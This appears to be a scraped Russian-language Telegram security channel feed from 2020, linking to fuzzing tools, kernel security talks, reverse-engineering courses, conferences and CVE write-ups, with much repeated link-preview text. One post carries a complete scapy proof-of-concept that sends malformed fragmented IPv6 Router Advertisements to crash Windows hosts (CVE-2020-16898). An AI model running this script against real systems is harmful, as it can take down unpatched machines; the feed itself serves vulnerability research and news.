A Linux Kernel Module that implements a fast snapshot mechanism for fuzzing.
https://github.com/AFLplusplus/AFL-Snapshot-LKM
https://github.com/AFLplusplus/AFL-Snapshot-LKM
GitHub
GitHub - AFLplusplus/AFL-Snapshot-LKM: A Linux Kernel Module that implements a fast snapshot mechanism for fuzzing.
A Linux Kernel Module that implements a fast snapshot mechanism for fuzzing. - AFLplusplus/AFL-Snapshot-LKM
10 Years of Linux Security очень качественный обзор технологий безопасности линукс от Bradley Spengler'а (создателя grsecurity) 💣
https://www.youtube.com/watch?v=F_Kza6fdkSU
https://www.youtube.com/watch?v=F_Kza6fdkSU
YouTube
10 Years of Linux Security - A Report Card
Presented by Brad Spengler virtually at the 2020 Linux Security Summit North America on July 2nd, 2020.
This presentation is a follow-up to an earlier presentation entitled "Linux Security in 10 Years" delivered at the first Linux Security Summit in Boston…
This presentation is a follow-up to an earlier presentation entitled "Linux Security in 10 Years" delivered at the first Linux Security Summit in Boston…
Memory Tagging for the Kernel: Tag-Based KASAN от @xa1ry 🔥
https://docs.google.com/presentation/d/10V_msbtEap9dNerKvTrRAzvfzYdrQFC8e2NYHCZYJDE
https://docs.google.com/presentation/d/10V_msbtEap9dNerKvTrRAzvfzYdrQFC8e2NYHCZYJDE
Google Docs
2020, Android Security Symposium: Memory Tagging for the Kernel: Tag-Based KASAN
Memory Tagging for the Kernel: Tag-Based KASAN Andrey Konovalov <[email protected]> Android Security Symposium July 7th 2020
SymCC: efficient compiler-based symbolic execution
https://www.s3.eurecom.fr/tools/symbolic_execution/symcc.html
https://github.com/eurecom-s3/symcc
https://www.s3.eurecom.fr/tools/symbolic_execution/symcc.html
https://github.com/eurecom-s3/symcc
www.s3.eurecom.fr
SymCC | S3
The S3 Software and System Security Group @ EURECOM website.
CVE-2020-1350 классика никогда не остаревает, красивый integer overflow раскручивается в переполняшку в куче.
SIGRed - 17-летний баг с вполне себе "червивым" вектором распросранения через RCE в DNS в обработке DNS на винде. MS ну как же такое еще возможно в 2020 году! 🔥🙈
https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/
SIGRed - 17-летний баг с вполне себе "червивым" вектором распросранения через RCE в DNS в обработке DNS на винде. MS ну как же такое еще возможно в 2020 году! 🔥🙈
https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/
Check Point Research
SIGRed - Resolving Your Way into Domain Admin: Exploiting a 17 Year-old Bug in Windows DNS Servers - Check Point Research
Research by: Sagi Tzadik Introduction DNS, which is often described as the “phonebook of the internet”, is a network protocol for translating human-friendly computer hostnames into IP addresses. Because it is such a core component of the internet, there are…
Введение в reverse engineering с Ghidra от HackadayU 🔬⌨️
Довольно неплохой тренинг для начинающих или для тех кто хочет разобраться с Ghidra с нуля.
https://youtu.be/d4Pgi5XML8E
https://youtu.be/uyWVztMHWtk
Довольно неплохой тренинг для начинающих или для тех кто хочет разобраться с Ghidra с нуля.
https://youtu.be/d4Pgi5XML8E
https://youtu.be/uyWVztMHWtk
YouTube
HackadayU: Reverse Engineering with Ghidra Class 1
This is Class 1 in Reverse Engineering with Ghidra taught by Matthew Alt.
Learn with us: https://www.hackaday.io/u
Playlist for the Reverse Engineering with Ghidra series:
https://www.youtube.com/playlist?list=PL_tws4AXg7auglkFo6ZRoWGXnWL0FHAEi
0:00 - Presentation…
Learn with us: https://www.hackaday.io/u
Playlist for the Reverse Engineering with Ghidra series:
https://www.youtube.com/playlist?list=PL_tws4AXg7auglkFo6ZRoWGXnWL0FHAEi
0:00 - Presentation…
SharePoint and Pwn :: Remote Code Execution Against SharePoint Server Abusing DataSet (CVE-2020-1147)
https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
Apple официально запустила обещанную программу по отправке "бесплатных" устройств для исследований и поиска уязвимостей тем, кто подходит под следующие условия:
- у вас есть оплаченный аккаунт разработчика(99$/year)
- у вас есть принятые баги в экосистеме эпл или других популярных ОС и платформ
- вы находитесь на следующей территории: Australia, Austria, Belgium, Canada, Czech Republic, Denmark, Finland, France, Germany, Hungary, Ireland, Italy, Japan, Luxembourg, Netherlands, Norway, Poland, Portugal, Spain, Sweden, Switzerland, United Kingdom, и United States
https://developer.apple.com/programs/security-research-device/
P.S. Но если что, есть checkm8 ;)
- у вас есть оплаченный аккаунт разработчика(99$/year)
- у вас есть принятые баги в экосистеме эпл или других популярных ОС и платформ
- вы находитесь на следующей территории: Australia, Austria, Belgium, Canada, Czech Republic, Denmark, Finland, France, Germany, Hungary, Ireland, Italy, Japan, Luxembourg, Netherlands, Norway, Poland, Portugal, Spain, Sweden, Switzerland, United Kingdom, и United States
https://developer.apple.com/programs/security-research-device/
P.S. Но если что, есть checkm8 ;)
Security Research Device - Apple Security Research
Get an iPhone dedicated to security research through the Apple Security Research Device program. Learn how to apply.
MMS Exploit Part 1: Introduction to the Samsung Qmage Codec and Remote Attack Surface
MMS Exploit Part 2: Effective Fuzzing of the Qmage Codec
Интересный цикл статей от Mateusz Jurczyk из Project Zero, о возможных атаках на аппаратные кодеки для ускорения обработки изображений, на примере Samsung Qmage Codec . Этот вектор мало, где детально рассматривается, но он совершенно однозначно заслуживает большего внимания со стороны исследователей 🏴☠️🧨
MMS Exploit Part 2: Effective Fuzzing of the Qmage Codec
Интересный цикл статей от Mateusz Jurczyk из Project Zero, о возможных атаках на аппаратные кодеки для ускорения обработки изображений, на примере Samsung Qmage Codec . Этот вектор мало, где детально рассматривается, но он совершенно однозначно заслуживает большего внимания со стороны исследователей 🏴☠️🧨
Blogspot
MMS Exploit Part 1: Introduction to the Samsung Qmage Codec and Remote Attack Surface
Posted by Mateusz Jurczyk, Project Zero This post is the first of a multi-part series capturing my journey from discovering a vulnerable...
Мой HITB keynote "Hardware Security Is Hard: How Hardware Boundaries Define Platform Security" начинается через 5 минут, вот ссылка на стрим 🧨
https://www.youtube.com/watch?v=siylg59I6FA
https://www.youtube.com/watch?v=siylg59I6FA
YouTube
HITB Lockdown002 - Day 1 Track 1
Got a question for our speakers? Ask on Discord or sli.do #askinthebox https://conference.hitb.org/discord/ https://app.sli.do/event/tsrb5qdg/live/questionsM...
Inside the 8086 processor, tiny charge pumps create a negative voltage
http://www.righto.com/2020/07/inside-8086-processor-tiny-charge-pumps.html
http://www.righto.com/2020/07/inside-8086-processor-tiny-charge-pumps.html
Righto
Inside the 8086 processor, tiny charge pumps create a negative voltage
Introduced in 1978, the revolutionary Intel 8086 microprocessor led to the x86 processors used in most desktop and server computing today....
Можно ли зарейзить миллион $ на kickstarter на хакерском девайсе для фрикинга? Ответ да, и лучшее тому подтверждение @zhovner и команда Flipper Devices.
Поздравляем с ошеломительным запуском компании и ждем больше новостей с участием Flipper Zero в обозримом будущем!
@d0znpp записал отличное видео поэтому поводу: https://www.youtube.com/watch?v=DgXX2_XNKe4
https://www.kickstarter.com/projects/flipper-devices/flipper-zero-tamagochi-for-hackers/description
Поздравляем с ошеломительным запуском компании и ждем больше новостей с участием Flipper Zero в обозримом будущем!
@d0znpp записал отличное видео поэтому поводу: https://www.youtube.com/watch?v=DgXX2_XNKe4
https://www.kickstarter.com/projects/flipper-devices/flipper-zero-tamagochi-for-hackers/description
YouTube
$700'000 за день на KickStarter. Хакеры умеют! Flipper Zero
Обзор компании Flipper Zero, как надо делать крутые продукты и крутой маркетинг для KickStarter. Поддерживаю хакеров (по своей инициативе).
Заказывайте на KickStarter! https://www.kickstarter.com/projects/flipper-devices/flipper-zero-tamagochi-for-hackers…
Заказывайте на KickStarter! https://www.kickstarter.com/projects/flipper-devices/flipper-zero-tamagochi-for-hackers…
DEF CON Safe Mode online! 📺👻
https://www.youtube.com/watch?v=aLe-xW-Ws4c&list=PL9fPq3eQfaaBk9DFnyJRpxPi8Lz1n7cFv
https://www.youtube.com/watch?v=aLe-xW-Ws4c&list=PL9fPq3eQfaaBk9DFnyJRpxPi8Lz1n7cFv
YouTube
DEF CON Safe Mode - Christopher Wade - Beyond Root
Rooting a smartphone is often considered the ultimate method to allow a user to take complete control of their device. Despite this, many smartphones contain hardware which is closed off to any modification. This talk aims to show how this hardware can be…
Уже через 5 минут начнется конференция r2con 2020 в онлайн формате, посвященная различным темам, связанным тем или иным образом с reverse engineering.
Отдельно хотелось бы отметить доклады Codename: flip.re, From hardware to zero-day от Olivia, Semi-automatic Code Deobfuscation, ESIL side-channel simulation и конечно же серию докладов по новым фичам, созданных в рамках GSoC 2020, под руководством гостя одного из выпусков нашего подкаста - Xvilka.
Стрим: https://www.youtube.com/channel/UCZo6gyBPj6Vgg8u2dfIhY4Q
Расписание: https://rada.re/con/2020/assets/r2con2020schedule.pdf
Сайт: https://rada.re/con/2020/
Отдельно хотелось бы отметить доклады Codename: flip.re, From hardware to zero-day от Olivia, Semi-automatic Code Deobfuscation, ESIL side-channel simulation и конечно же серию докладов по новым фичам, созданных в рамках GSoC 2020, под руководством гостя одного из выпусков нашего подкаста - Xvilka.
Стрим: https://www.youtube.com/channel/UCZo6gyBPj6Vgg8u2dfIhY4Q
Расписание: https://rada.re/con/2020/assets/r2con2020schedule.pdf
Сайт: https://rada.re/con/2020/
YouTube
radareorg
Your favourite conference around the tool radare2
Forwarded from Silicon Pravda
Собирали $60k, а вышло $5M. Хакеры на Kickstarter https://youtu.be/gp3W8cL_nKc
YouTube
Интервью с Flipper Zero: тамагочи для хакеров: который собрал $5M на KickStarter
Всем здравствуйте! Это Силиконовая правда. Меня зовут Иван. Я предприниматель. Живу в Кремниевой Долине. Этот блог про долину, бизнес, предпринимательство, запуск бизнеса в США и всё такое.
Группа YCombinator in Russian в Facebook, где выпускники YC помогают…
Группа YCombinator in Russian в Facebook, где выпускники YC помогают…
Forwarded from . .
YouTube
📜ИСТОРИЯ СОЗДАНИЯ И РАЗВИТИЯ ПРОГРАММЫ Intercepter-NG | СОФТ | РАЗРАБОТКА📗
Как все начиналось, через какие этапы проходила разработка Intercepter'а, рассказываю и показываю!
Twitter: https://twitter.com/IntercepterNG
Telegram канал: https://t.iss.one/cepter
Telegram чат: https://t.iss.one/cepter_chat
Music: Dubsane - Sand Dunes
#история…
Twitter: https://twitter.com/IntercepterNG
Telegram канал: https://t.iss.one/cepter
Telegram чат: https://t.iss.one/cepter_chat
Music: Dubsane - Sand Dunes
#история…
CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
from scapy.all import *
v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4
c = ICMPv6NDOptEFA();
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:
send(p)
Quarkslab
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898) - Quarkslab's…
This blog post analyzes the vulnerability known as "Bad Neighbor" or CVE-2020-16898, a stack-based buffer overflow in the IPv6 stack of Windows, which can be remotely triggered by means of a malformed Router Advertisement packet.
Найдено несколько уязвимостей в Jitsi Meet:
- Arbitrary Client Remote Code Execution (CVE-2020-27162)
- Limited Certificate Validation Bypass (CVE-2020-27161)
https://research.nccgroup.com/2020/10/23/technical-advisory-jitsi-meet-electron-arbitrary-client-remote-code-execution-cve-2020-27162/
- Arbitrary Client Remote Code Execution (CVE-2020-27162)
- Limited Certificate Validation Bypass (CVE-2020-27161)
https://research.nccgroup.com/2020/10/23/technical-advisory-jitsi-meet-electron-arbitrary-client-remote-code-execution-cve-2020-27162/
EoP 0-day exploited in the wild: Windows Kernel Cryptography Driver cng.sys pool-based buffer overflow in IOCTL 0x390400
PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=2104
PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=2104